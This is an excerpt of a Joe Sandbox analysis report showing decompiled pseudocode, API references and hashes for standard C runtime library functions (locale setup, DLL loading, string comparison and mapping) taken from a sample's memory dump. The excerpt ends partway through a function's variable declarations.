0x0040b31b
0x0040b320
0x0040b362
0x0040b362
0x0040b366
0x0040b378
0x0040b378
0x0040b37a
0x00000000
0x00000000
0x00000000
0x00000000
0x0040b368
0x0040b368
0x0040b36d
0x0040b370
0x0040b37c
0x0040b37c
0x0040b37f
0x0040b382
0x0040b384
0x00000000
0x0040b386
0x0040b389
0x0040b38b
0x0040b390
0x0040b393
0x0040b396
0x0040b3bd
0x0040b3c2
0x0040b3c3
0x0040b3c4
0x0040b3c5
0x0040b3c6
0x0040b3c7
0x0040b3c8
0x0040b3c9
0x0040b3ca
0x0040b3cb
0x0040b3cc
0x0040b3cd
0x0040b3ce
0x0040b3cf
0x0040b3d0
0x0040b3d1
0x0040b3d5
0x0040b3d7
0x0040b410
0x0040b410
0x0040b417
0x0040b3d9
0x0040b3d9
0x0040b3d9
0x0040b3dc
0x0040b3e1
0x00000000
0x0040b3e3
0x0040b3e3
0x0040b3e4
0x0040b3e6
0x0040b3e8
0x0040b3ea
0x0040b3f0
0x0040b3f0
0x0040b3f2
0x0040b3f5
0x0040b3f7
0x0040b401
0x0040b403
0x0040b403
0x0040b3f0
0x0040b408
0x0040b40f
0x0040b40f
0x0040b3e1
0x0040b398
0x0040b398
0x0040b39b
0x0040b39f
0x0040b3a3
0x0040b3aa
0x0040b3af
0x0040b3b2
0x00000000
0x0040b3b2
0x0040b396
0x0040b372
0x0040b375
0x00000000
0x0040b375
0x0040b370
0x0040b322
0x0040b322
0x0040b322
0x0040b325
0x0040b328
0x0040b32c
0x0040b331
0x0040b335
0x0040b33c
0x0040b347
0x0040b34f
0x0040b350
0x0040b351
0x0040b35f
0x0040b35f
0x0040b320

APIs

std::locale::_Init.LIBCPMT ref: 0040B2A5

Part of subcall function 00412660: __EH_prolog3.LIBCMT ref: 00412667
Part of subcall function 00412660: std::_Lockit::_Lockit.LIBCPMT ref: 00412672
Part of subcall function 00412660: std::locale::_Setgloballocale.LIBCPMT ref: 0041268D
Part of subcall function 00412660: _Yarn.LIBCPMT ref: 004126A3
Part of subcall function 00412660: std::_Lockit::~_Lockit.LIBCPMT ref: 004126E3

std::_Lockit::_Lockit.LIBCPMT ref: 0040B2BC
std::_Lockit::_Lockit.LIBCPMT ref: 0040B2DE
std::_Lockit::~_Lockit.LIBCPMT ref: 0040B2FE
std::_Lockit::~_Lockit.LIBCPMT ref: 0040B32C
std::_Facet_Register.LIBCPMT ref: 0040B3A3
Concurrency::cancel_current_task.LIBCPMT ref: 0040B3BD

Memory Dump Source

Source File: 00000006.00000002.573079819.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_C676.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$std::locale::_$Concurrency::cancel_current_taskFacet_H_prolog3InitRegisterSetgloballocaleYarn
String ID:
API String ID: 298508500-0
Opcode ID: 9f4bc39ae22e69c95f103ddf0abc74c8b0506fae08c52b9734041536cbc8bad0
Instruction ID: ff1659b67b507256d8fb927cf8064d15eabcb5019be6195162a6b86e99dc18e4
Opcode Fuzzy Hash: 9f4bc39ae22e69c95f103ddf0abc74c8b0506fae08c52b9734041536cbc8bad0
Instruction Fuzzy Hash: 5A418075D00208DFCB11CF98D941BAEB7B0FB48714F24416AD815B7381D778AE44CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 004230D4 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E004230D4(void* __ecx, signed int* _a4, intOrPtr _a8) {
				signed int _v8;
				void* _t20;
				void* _t22;
				WCHAR* _t26;
				signed int _t29;
				void** _t30;
				signed int* _t35;
				void* _t38;
				void* _t40;

				_t35 = _a4;
				while(_t35 != _a8) {
					_t29 =  *_t35;
					_v8 = _t29;
					_t38 =  *(0x444d48 + _t29 * 4);
					if(_t38 == 0) {
						_t26 =  *(0x436e10 + _t29 * 4);
						_t38 = LoadLibraryExW(_t26, 0, 0x800);
						if(_t38 != 0) {
							L14:
							_t30 = 0x444d48 + _v8 * 4;
							 *_t30 = _t38;
							if( *_t30 != 0) {
								FreeLibrary(_t38);
							}
							L16:
							_t20 = _t38;
							L13:
							return _t20;
						}
						_t22 = GetLastError();
						if(_t22 != 0x57) {
							L9:
							 *(0x444d48 + _v8 * 4) = _t22 | 0xffffffff;
							L10:
							_t35 =  &(_t35[1]);
							continue;
						}
						_t22 = E00420218(_t26, L"api-ms-", 7);
						_t40 = _t40 + 0xc;
						if(_t22 == 0) {
							goto L9;
						}
						_t22 = E00420218(_t26, L"ext-ms-", 7);
						_t40 = _t40 + 0xc;
						if(_t22 == 0) {
							goto L9;
						}
						_t22 = LoadLibraryExW(_t26, _t38, _t38);
						_t38 = _t22;
						if(_t38 != 0) {
							goto L14;
						}
						goto L9;
					}
					if(_t38 != 0xffffffff) {
						goto L16;
					}
					goto L10;
				}
				_t20 = 0;
				goto L13;
			}

0x004230dd
0x00423172
0x004230e5
0x004230e7
0x004230f1
0x004230f6
0x00423103
0x00423118
0x0042311c
0x00423182
0x00423187
0x0042318e
0x00423192
0x00423195
0x00423195
0x0042319b
0x0042319b
0x0042317d
0x00423181
0x00423181
0x0042311e
0x00423127
0x00423160
0x0042316d
0x0042316f
0x0042316f
0x00000000
0x0042316f
0x00423131
0x00423136
0x0042313b
0x00000000
0x00000000
0x00423145
0x0042314a
0x0042314f
0x00000000
0x00000000
0x00423154
0x0042315a
0x0042315e
0x00000000
0x00000000
0x00000000
0x0042315e
0x004230fb
0x00000000
0x00000000
0x00000000
0x00423101
0x0042317b
0x00000000

APIs

FreeLibrary.KERNEL32(00000000,?,004231E1,00402EC7,?,?,00000000,?,?,0042340B,00000021,FlsSetValue,00437430,00437438,?), ref: 00423195

Strings

ext-ms-, xrefs: 0042313F
api-ms-, xrefs: 0042312B

Memory Dump Source

Source File: 00000006.00000002.573079819.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_C676.jbxd

Similarity

API ID: FreeLibrary
String ID: api-ms-$ext-ms-
API String ID: 3664257935-537541572
Opcode ID: f0df5e45352c92f9d67394726655a06941e75b4868e660512e8b928e2338077a
Instruction ID: 82b5b76a2cbfa9af0ecd2bd83a300dfd513fac302c34fec3c259524cb878e5d2
Opcode Fuzzy Hash: f0df5e45352c92f9d67394726655a06941e75b4868e660512e8b928e2338077a
Instruction Fuzzy Hash: EF212075B00221BBCB219F64AC81A6B33789B417A2F250122F805A7290D73CEF11CAEC

Uniqueness

Uniqueness Score: -1.00%

Function 0041E1D3 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 42
libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 25%

			E0041E1D3(intOrPtr _a4) {
				char _v16;
				signed int _v20;
				signed int _t11;
				int _t14;
				void* _t16;
				void* _t20;
				int _t22;
				signed int _t23;

				_t11 =  *0x443048; // 0x35200185
				 *[fs:0x0] =  &_v16;
				_v20 = _v20 & 0x00000000;
				_t14 =  &_v20;
				__imp__GetModuleHandleExW(0, L"mscoree.dll", _t14, _t11 ^ _t23, _t20, _t16,  *[fs:0x0], 0x4318a0, 0xffffffff);
				if(_t14 != 0) {
					_t14 = GetProcAddress(_v20, "CorExitProcess");
					_t22 = _t14;
					if(_t22 != 0) {
						 *0x4331a4(_a4);
						_t14 =  *_t22();
					}
				}
				if(_v20 != 0) {
					_t14 = FreeLibrary(_v20);
				}
				 *[fs:0x0] = _v16;
				return _t14;
			}

0x0041e1e8
0x0041e1f3
0x0041e1f9
0x0041e1fd
0x0041e208
0x0041e210
0x0041e21a
0x0041e220
0x0041e224
0x0041e22b
0x0041e231
0x0041e231
0x0041e224
0x0041e237
0x0041e23c
0x0041e23c
0x0041e245
0x0041e24f

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,35200185,?,?,00000000,004318A0,000000FF,?,0041E163,?,?,0041E137,00000016), ref: 0041E208
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0041E21A
FreeLibrary.KERNEL32(00000000,?,00000000,004318A0,000000FF,?,0041E163,?,?,0041E137,00000016), ref: 0041E23C

Strings

mscoree.dll, xrefs: 0041E201
0'@, xrefs: 0041E22B
CorExitProcess, xrefs: 0041E212

Memory Dump Source

Source File: 00000006.00000002.573079819.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_C676.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: 0'@$CorExitProcess$mscoree.dll
API String ID: 4061214504-3869136949
Opcode ID: a35666b667b6824be0dd86e1a805249ec7202434fa09b65fc768ad604416d36e
Instruction ID: 3fb230787f26049f8eb3d17a73e89fb851ca5ebcfd2b5036e103cdca32cf97e4
Opcode Fuzzy Hash: a35666b667b6824be0dd86e1a805249ec7202434fa09b65fc768ad604416d36e
Instruction Fuzzy Hash: D601A775904515BFDB158F51DC06BAEBBB8FB08B11F004526F811A2390DB789A40CA58

Uniqueness

Uniqueness Score: -1.00%

Function 00430686 Relevance: 9.2, APIs: 6, Instructions: 248
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E00430686(signed int _a4, intOrPtr _a8, intOrPtr _a12, signed int _a16, int _a20, intOrPtr* _a24, intOrPtr* _a28, int _a32) {
				signed int _v8;
				char _v22;
				struct _cpinfo _v28;
				signed int _v32;
				intOrPtr* _v36;
				signed int _v40;
				intOrPtr _v44;
				void* _v56;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t49;
				int _t54;
				signed int _t59;
				signed int _t60;
				void* _t63;
				signed int _t64;
				signed int _t65;
				int _t71;
				char* _t76;
				char* _t77;
				int _t81;
				int _t82;
				intOrPtr _t94;
				intOrPtr _t95;
				signed int _t103;
				void* _t104;
				int _t106;
				void* _t107;
				intOrPtr* _t108;

				_t49 =  *0x443048; // 0x35200185
				_v8 = _t49 ^ _t103;
				_t83 = _a24;
				_v40 = _a4;
				_t102 = _a20;
				_v44 = _a8;
				_t53 = _a16;
				_v32 = _a16;
				_v36 = _a24;
				if(_t102 <= 0) {
					if(_t102 < 0xffffffff) {
						goto L54;
					} else {
						goto L3;
					}
				} else {
					_t81 = E0041D20D(_t53, _t102);
					_t83 = _v36;
					_t102 = _t81;
					L3:
					_t101 = _a28;
					if(_t101 <= 0) {
						if(_t101 < 0xffffffff) {
							goto L54;
						} else {
							goto L6;
						}
					} else {
						_t101 = E0041D20D(_t83, _t101);
						_a28 = _t101;
						L6:
						_t82 = _a32;
						if(_t82 == 0) {
							_t16 =  *_v40 + 8; // 0x464f5250
							_t82 =  *_t16;
							_a32 = _t82;
						}
						if(_t102 == 0 || _t101 == 0) {
							if(_t102 == _t101) {
								L61:
								_push(2);
								goto L23;
							} else {
								if(_t101 > 1) {
									L32:
									_t54 = 1;
								} else {
									if(_t102 > 1) {
										L22:
										_push(3);
										goto L23;
									} else {
										if(GetCPInfo(_t82,  &_v28) == 0) {
											goto L54;
										} else {
											if(_t102 <= 0) {
												if(_t101 <= 0) {
													goto L33;
												} else {
													if(_v28 >= 2) {
														_t76 =  &_v22;
														if(_v22 != 0) {
															_t101 = _v36;
															while(1) {
																_t94 =  *((intOrPtr*)(_t76 + 1));
																if(_t94 == 0) {
																	goto L32;
																}
																_t100 =  *_t101;
																if(_t100 <  *_t76 || _t100 > _t94) {
																	_t76 = _t76 + 2;
																	if( *_t76 != 0) {
																		continue;
																	} else {
																		goto L32;
																	}
																} else {
																	goto L61;
																}
																goto L55;
															}
														}
													}
													goto L32;
												}
											} else {
												if(_v28 >= 2) {
													_t77 =  &_v22;
													if(_v22 != 0) {
														_t102 = _v32;
														while(1) {
															_t95 =  *((intOrPtr*)(_t77 + 1));
															if(_t95 == 0) {
																goto L22;
															}
															_t100 =  *_t102;
															if(_t100 <  *_t77 || _t100 > _t95) {
																_t77 = _t77 + 2;
																if( *_t77 != 0) {
																	continue;
																} else {
																	goto L22;
																}
															} else {
																goto L61;
															}
															goto L23;
														}
													}
												}
												goto L22;
												L23:
												_pop(_t54);
											}
										}
									}
								}
							}
						} else {
							L33:
							_t59 = E00427CB5(_t82, 9, _v32, _t102, 0, 0);
							_t106 = _t104 + 0x18;
							_v40 = _t59;
							if(_t59 == 0) {
								L54:
								_t54 = 0;
							} else {
								_t100 = _t59 + _t59 + 8;
								asm("sbb eax, eax");
								_t60 = _t59 & _t59 + _t59 + 0x00000008;
								if(_t60 == 0) {
									L60:
									_push(0);
									goto L59;
								} else {
									if(_t60 > 0x400) {
										_t82 = E00421D39(_t60);
										if(_t82 == 0) {
											goto L60;
										} else {
											 *_t82 = 0xdddd;
											goto L40;
										}
									} else {
										E00413C50(_t60);
										_t82 = _t106;
										if(_t82 == 0) {
											goto L60;
										} else {
											 *_t82 = 0xcccc;
											L40:
											_t82 = _t82 + 8;
											if(_t82 == 0) {
												goto L60;
											} else {
												_t102 = _a32;
												_t63 = E00427CB5(_a32, 1, _v32, _a32, _t82, _v40);
												_t107 = _t106 + 0x18;
												if(_t63 == 0) {
													L58:
													_push(_t82);
													L59:
													E00413149();
													goto L53;
												} else {
													_t101 = _v36;
													_t64 = E00427CB5(_t102, 9, _v36, _v36, 0, 0);
													_t108 = _t107 + 0x18;
													_v32 = _t64;
													if(_t64 == 0) {
														goto L58;
													} else {
														_t100 = _t64 + _t64 + 8;
														asm("sbb eax, eax");
														_t65 = _t64 & _t64 + _t64 + 0x00000008;
														if(_t65 == 0) {
															L57:
															_push(0);
															goto L52;
														} else {
															if(_t65 > 0x400) {
																_t101 = E00421D39(_t65);
																if(_t101 == 0) {
																	goto L57;
																} else {
																	 *_t101 = 0xdddd;
																	goto L49;
																}
															} else {
																E00413C50(_t65);
																_t101 = _t108;
																if(_t101 == 0) {
																	goto L57;
																} else {
																	 *_t101 = 0xcccc;
																	L49:
																	_t101 = _t101 + 8;
																	if(_t101 == 0) {
																		goto L57;
																	} else {
																		if(E00427CB5(_t102, 1, _v36, _a28, _t101, _v32) != 0) {
																			_t71 = E00423281(_v44, _a12, _t82, _v40, _t101, _v32, 0, 0, 0);
																			_t102 = _t71;
																			E00413149(_t101);
																			E00413149(_t82);
																			_t54 = _t71;
																		} else {
																			_push(_t101);
																			L52:
																			E00413149();
																			E00413149(_t82);
																			L53:
																			goto L54;
																		}
																	}
																}
															}
														}
													}
												}
											}
										}
									}
								}
							}
						}
					}
				}
				L55:
				return E0041361E(_t54, _t82, _v8 ^ _t103, _t100, _t101, _t102);
			}

0x0043068e
0x00430695
0x0043069b
0x0043069f
0x004306a6
0x004306a9
0x004306ac
0x004306af
0x004306b2
0x004306b8
0x004306cd
0x00000000
0x00000000
0x00000000
0x00000000
0x004306ba
0x004306bc
0x004306c3
0x004306c6
0x004306d3
0x004306d3
0x004306d8
0x004306ed
0x00000000
0x00000000
0x00000000
0x00000000
0x004306da
0x004306e2
0x004306e5
0x004306f3
0x004306f3
0x004306f8
0x004306ff
0x004306ff
0x00430702
0x00430702
0x00430707
0x00430713
0x0043091e
0x0043091e
0x00000000
0x00430719
0x0043071c
0x004307a8
0x004307aa
0x00430722
0x00430725
0x0043076d
0x0043076d
0x00000000
0x00430727
0x00430734
0x00000000
0x0043073a
0x0043073c
0x00430777
0x00000000
0x00430779
0x0043077d
0x00430783
0x00430786
0x00430788
0x0043078b
0x0043078b
0x00430790
0x00000000
0x00000000
0x00430792
0x00430796
0x004307a0
0x004307a6
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00430796
0x0043078b
0x00430786
0x00000000
0x0043077d
0x0043073e
0x00430742
0x00430748
0x0043074b
0x0043074d
0x00430750
0x00430750
0x00430755
0x00000000
0x00000000
0x00430757
0x0043075b
0x00430765
0x0043076b
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0043075b
0x00430750
0x0043074b
0x00000000
0x0043076f
0x0043076f
0x0043076f
0x0043073c
0x00430734
0x00430725
0x0043071c
0x004307b0
0x004307b0
0x004307bb
0x004307c0
0x004307c3
0x004307c8
0x004308ce
0x004308ce
0x004307ce
0x004307d1
0x004307d6
0x004307d8
0x004307da
0x0043091a
0x0043091a
0x00000000
0x004307e0
0x004307e5
0x00430804
0x00430809
0x00000000
0x0043080f
0x0043080f
0x00000000
0x0043080f
0x004307e7
0x004307e7
0x004307ec
0x004307f0
0x00000000
0x004307f6
0x004307f6
0x00430815
0x00430815
0x0043081a
0x00000000
0x00430820
0x00430828
0x0043082e
0x00430833
0x00430838
0x00430912
0x00430912
0x00430913
0x00430913
0x00000000
0x0043083e
0x00430843
0x0043084a
0x0043084f
0x00430852
0x00430857
0x00000000
0x0043085d
0x00430860
0x00430865
0x00430867
0x00430869
0x0043090e
0x0043090e
0x00000000
0x0043086f
0x00430874
0x00430893
0x00430898
0x00000000
0x0043089a
0x0043089a
0x00000000
0x0043089a
0x00430876
0x00430876
0x0043087b
0x0043087f
0x00000000
0x00430885
0x00430885
0x004308a0
0x004308a0
0x004308a5
0x00000000
0x004308a7
0x004308be
0x004308f5
0x004308fb
0x004308fd
0x00430903
0x0043090a
0x004308c0
0x004308c0
0x004308c1
0x004308c1
0x004308c7
0x004308cd
0x00000000
0x004308cd
0x004308be
0x004308a5
0x0043087f
0x00430874
0x00430869
0x00430857
0x00430838
0x0043081a
0x004307f0
0x004307e5
0x004307da
0x004307c8
0x00430707
0x004306d8
0x004308d0
0x004308e1

APIs

GetCPInfo.KERNEL32(0069FC10,0069FC10,?,7FFFFFFF,?,00430956,0069FC10,0069FC10,?,0069FC10,?,?,?,?,0069FC10,?), ref: 0043072C
__freea.LIBCMT ref: 004308C1
__freea.LIBCMT ref: 004308C7
__freea.LIBCMT ref: 004308FD
__freea.LIBCMT ref: 00430903
__freea.LIBCMT ref: 00430913

Memory Dump Source

Source File: 00000006.00000002.573079819.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_C676.jbxd

Similarity

API ID: __freea$Info
String ID:
API String ID: 541289543-0
Opcode ID: a1cbc33eff90fe2b344755f632616b55fe11d0652a8795251ae22a82f021beef
Instruction ID: a13ec234aee0f392bb2bc3a7f28e20972502c33dd6403985fd9b332b5f3b83e5
Opcode Fuzzy Hash: a1cbc33eff90fe2b344755f632616b55fe11d0652a8795251ae22a82f021beef
Instruction Fuzzy Hash: 78710672A002196BEF24AF658C61BAF77B59F4D314F24121BE814A7382D73CDD418BA9

Uniqueness

Uniqueness Score: -1.00%

Function 00413167 Relevance: 9.2, APIs: 6, Instructions: 224
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 72%

			E00413167(intOrPtr _a4, intOrPtr _a8, short* _a12, short* _a16, char* _a20, int _a24, int _a28) {
				signed int _v8;
				char _v22;
				struct _cpinfo _v28;
				int _v32;
				char* _v36;
				short* _v40;
				int _v44;
				short* _v48;
				short* _v52;
				intOrPtr _v56;
				void* _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t54;
				short* _t58;
				signed int _t63;
				signed int _t64;
				short* _t66;
				signed int _t68;
				signed int _t69;
				short* _t72;
				char* _t75;
				char* _t76;
				int _t79;
				intOrPtr _t88;
				intOrPtr _t89;
				short* _t96;
				signed int _t97;
				short* _t98;

				_t54 =  *0x443048; // 0x35200185
				_v8 = _t54 ^ _t97;
				_t96 = _a12;
				_t95 = _a16;
				_v56 = _a4;
				_t57 = _a20;
				_v32 = _t96;
				_v36 = _a20;
				if(_t95 <= 0) {
					if(_t95 < 0xffffffff) {
						goto L56;
					}
					goto L3;
				} else {
					_t95 = E0041D20D(_t96, _t95);
					_t57 = _v36;
					L3:
					_t79 = _a24;
					if(_t79 <= 0) {
						if(_t79 < 0xffffffff) {
							L56:
							_t58 = 0;
							L57:
							return E0041361E(_t58, _t79, _v8 ^ _t97, _t94, _t95, _t96);
						}
						L6:
						if(_t95 == 0 || _t79 == 0) {
							if(_t95 == _t79) {
								L55:
								_push(2);
								L20:
								_pop(_t58);
								goto L57;
							}
							if(_t79 > 1) {
								L29:
								_t58 = 1;
								goto L57;
							}
							if(_t95 > 1) {
								L19:
								_push(3);
								goto L20;
							}
							if(GetCPInfo(_a28,  &_v28) == 0) {
								goto L56;
							}
							if(_t95 <= 0) {
								if(_t79 <= 0) {
									goto L30;
								}
								if(_v28 < 2) {
									goto L29;
								}
								_t75 =  &_v22;
								if(_v22 == 0) {
									goto L29;
								}
								_t95 = _v36;
								while(1) {
									_t88 =  *((intOrPtr*)(_t75 + 1));
									if(_t88 == 0) {
										goto L29;
									}
									_t94 =  *_t95;
									if(_t94 <  *_t75 || _t94 > _t88) {
										_t75 = _t75 + 2;
										if( *_t75 != 0) {
											continue;
										}
										goto L29;
									} else {
										goto L55;
									}
								}
								goto L29;
							}
							if(_v28 < 2) {
								goto L19;
							}
							_t76 =  &_v22;
							if(_v22 == 0) {
								goto L19;
							} else {
								goto L15;
							}
							while(1) {
								L15:
								_t89 =  *((intOrPtr*)(_t76 + 1));
								if(_t89 == 0) {
									goto L19;
								}
								_t94 =  *_t96;
								if(_t94 <  *_t76 || _t94 > _t89) {
									_t76 = _t76 + 2;
									if( *_t76 != 0) {
										continue;
									}
									goto L19;
								} else {
									goto L55;
								}
							}
							goto L19;
						} else {
							L30:
							_t96 = 0;
							_t63 = MultiByteToWideChar(_a28, 9, _v32, _t95, 0, 0);
							_v44 = _t63;
							if(_t63 == 0) {
								goto L56;
							}
							_t94 = _t63 + _t63 + 8;
							asm("sbb eax, eax");
							_t64 = _t63 & _t63 + _t63 + 0x00000008;
							if(_t64 == 0) {
								_v52 = 0;
								L54:
								E00412F64( &_v52);
								_t58 = _t96;
								goto L57;
							}
							if(_t64 > 0x400) {
								_push(_t64);
								_t66 = E0041BF16();
								_v40 = _t66;
								if(_t66 == 0) {
									L38:
									_v52 = _t66;
									if(_t66 == 0 || MultiByteToWideChar(_a28, 1, _v32, _t95, _t66, _v44) == 0) {
										goto L54;
									} else {
										_t95 = _v36;
										_t68 = MultiByteToWideChar(_a28, 9, _v36, _t79, _t96, _t96);
										_v32 = _t68;
										if(_t68 == 0) {
											goto L54;
										}
										_t94 = _t68 + _t68 + 8;
										asm("sbb eax, eax");
										_t69 = _t68 & _t68 + _t68 + 0x00000008;
										if(_t69 == 0) {
											_v48 = _t96;
											L52:
											E00412F64( &_v48);
											goto L54;
										}
										if(_t69 > 0x400) {
											_push(_t69);
											_t95 = E0041BF16();
											if(_t95 == 0) {
												L48:
												_v48 = _t95;
												if(_t95 != 0) {
													_t72 = MultiByteToWideChar(_a28, 1, _v36, _t79, _t95, _v32);
													if(_t72 != 0) {
														__imp__CompareStringEx(_v56, _a8, _v40, _v44, _t95, _v32, _t96, _t96, _t96);
														_t96 = _t72;
													}
												}
												goto L52;
											}
											 *_t95 = 0xdddd;
											L47:
											_t95 =  &(_t95[4]);
											goto L48;
										}
										E00413C50(_t69);
										_t95 = _t98;
										if(_t95 == 0) {
											goto L48;
										}
										 *_t95 = 0xcccc;
										goto L47;
									}
								}
								 *_t66 = 0xdddd;
								L37:
								_t66 =  &(_t66[4]);
								_v40 = _t66;
								goto L38;
							}
							E00413C50(_t64);
							_t66 = _t98;
							_v40 = _t66;
							if(_t66 == 0) {
								goto L38;
							}
							 *_t66 = 0xcccc;
							goto L37;
						}
					}
					_t79 = E0041D20D(_t57, _t79);
					goto L6;
				}
			}

0x0041316d
0x00413174
0x0041317c
0x00413180
0x00413183
0x00413186
0x00413189
0x0041318c
0x00413191
0x004131a6
0x00000000
0x00000000
0x00000000
0x00413193
0x0041319b
0x0041319d
0x004131ac
0x004131ac
0x004131b1
0x004131c3
0x004133b9
0x004133b9
0x004133bb
0x004133cc
0x004133cc
0x004131c9
0x004131cb
0x004131d7
0x004133b2
0x004133b2
0x00413232
0x00413232
0x00000000
0x00413232
0x004131e0
0x0041326b
0x0041326d
0x00000000
0x0041326d
0x004131e9
0x00413230
0x00413230
0x00000000
0x00413230
0x004131fa
0x00000000
0x00000000
0x00413202
0x0041323a
0x00000000
0x00000000
0x00413240
0x00000000
0x00000000
0x00413246
0x00413249
0x00000000
0x00000000
0x0041324b
0x0041324e
0x0041324e
0x00413253
0x00000000
0x00000000
0x00413255
0x00413259
0x00413263
0x00413269
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00413259
0x00000000
0x0041324e
0x00413208
0x00000000
0x00000000
0x0041320e
0x00413211
0x00000000
0x00000000
0x00000000
0x00000000
0x00413213
0x00413213
0x00413213
0x00413218
0x00000000
0x00000000
0x0041321a
0x0041321e
0x00413228
0x0041322e
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0041321e
0x00000000
0x00413273
0x00413273
0x00413273
0x00413280
0x00413286
0x0041328b
0x00000000
0x00000000
0x00413294
0x00413299
0x0041329b
0x0041329d
0x004133a3
0x004133a6
0x004133a9
0x004133ae
0x00000000
0x004133ae
0x004132a8
0x004132c0
0x004132c1
0x004132c6
0x004132cc
0x004132da
0x004132da
0x004132df
0x00000000
0x00413300
0x00413300
0x0041330c
0x00413312
0x00413317
0x00000000
0x00000000
0x00413320
0x00413325
0x00413327
0x00413329
0x00413396
0x00413399
0x0041339c
0x00000000
0x0041339c
0x00413330
0x00413345
0x0041334b
0x00413350
0x0041335b
0x0041335b
0x00413360
0x0041336f
0x00413377
0x0041338c
0x00413392
0x00413392
0x00413377
0x00000000
0x00413360
0x00413352
0x00413358
0x00413358
0x00000000
0x00413358
0x00413332
0x00413337
0x0041333b
0x00000000
0x00000000
0x0041333d
0x00000000
0x0041333d
0x004132df
0x004132ce
0x004132d4
0x004132d4
0x004132d7
0x00000000
0x004132d7
0x004132aa
0x004132af
0x004132b1
0x004132b6
0x00000000
0x00000000
0x004132b8
0x00000000
0x004132b8
0x004131cb
0x004131bc
0x00000000
0x004131bc

APIs

GetCPInfo.KERNEL32(?,?,?,?,?), ref: 004131F2
MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 00413280
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 004132F2
MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 0041330C
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0041336F
CompareStringEx.KERNEL32 ref: 0041338C

Memory Dump Source

Source File: 00000006.00000002.573079819.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_C676.jbxd

Similarity

API ID: ByteCharMultiWide$CompareInfoString
String ID:
API String ID: 2984826149-0
Opcode ID: 1e366924a8afa3260e4bda327b1684d08ec726ce12f8cd426a0c9c91e282a787
Instruction ID: 2be33855410c22ce869d50a1c264c227976abd848f31d1ba5e0114bd0dc5f069
Opcode Fuzzy Hash: 1e366924a8afa3260e4bda327b1684d08ec726ce12f8cd426a0c9c91e282a787
Instruction Fuzzy Hash: D471F47190024AABDF209FA5CC45AEF7BB5EF45316F14005BE914E6250DB3DCA85CB6C

Uniqueness

Uniqueness Score: -1.00%

Function 00412F7D Relevance: 9.2, APIs: 6, Instructions: 175COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,00000001,?,00000000,00000000,?,?,?,00000001), ref: 00412FC6
MultiByteToWideChar.KERNEL32(00000001,00000001,00000000,?,00000000,00000000), ref: 00413031
LCMapStringEx.KERNEL32 ref: 0041304E
LCMapStringEx.KERNEL32 ref: 0041308D
LCMapStringEx.KERNEL32 ref: 004130EC
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 0041310F

Memory Dump Source

Source File: 00000006.00000002.573079819.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_C676.jbxd

Similarity

API ID: ByteCharMultiStringWide
String ID:
API String ID: 2829165498-0
Opcode ID: 1666661308ac9c99fe0898e319a5e1a5e0521e4177e49a6af332319b6bf95ff5
Instruction ID: 118d9ae00c13b7aa2d11932e4adea69e1be9d9323359ec601ddb07f2daa3e6c1
Opcode Fuzzy Hash: 1666661308ac9c99fe0898e319a5e1a5e0521e4177e49a6af332319b6bf95ff5
Instruction Fuzzy Hash: 4451E27260021ABBEF209F60CC45FEB7BB9EF44746F20442AF915D6250D739CE919B98

Uniqueness

Uniqueness Score: -1.00%

Function 0040B420 Relevance: 9.1, APIs: 6, Instructions: 116
COMMON

Download Yara Rule

C-Code - Quality: 62%

			E0040B420(signed int* __ecx, void* __edx) {
				char _v8;
				intOrPtr _v12;
				char _v16;
				signed int _v20;
				signed int _v24;
				char _v28;
				char _v32;
				char _v33;
				signed int* _v36;
				signed int _v40;
				signed int* _v44;
				void* _v56;
				signed int _v60;
				void* _v68;
				void* _v77;
				void* _v84;
				signed int _v88;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t47;
				signed int _t48;
				signed int _t52;
				void* _t57;
				signed int _t60;
				void* _t64;
				void* _t69;
				signed int _t74;
				signed int _t75;
				signed int* _t77;
				signed int _t78;
				signed int* _t79;
				void* _t80;
				signed int _t84;
				void* _t97;
				signed int _t99;
				signed int* _t100;
				void* _t101;
				signed int _t105;
				void* _t106;
				signed int _t107;
				signed int _t109;
				signed int _t110;
				void* _t111;
				void* _t112;
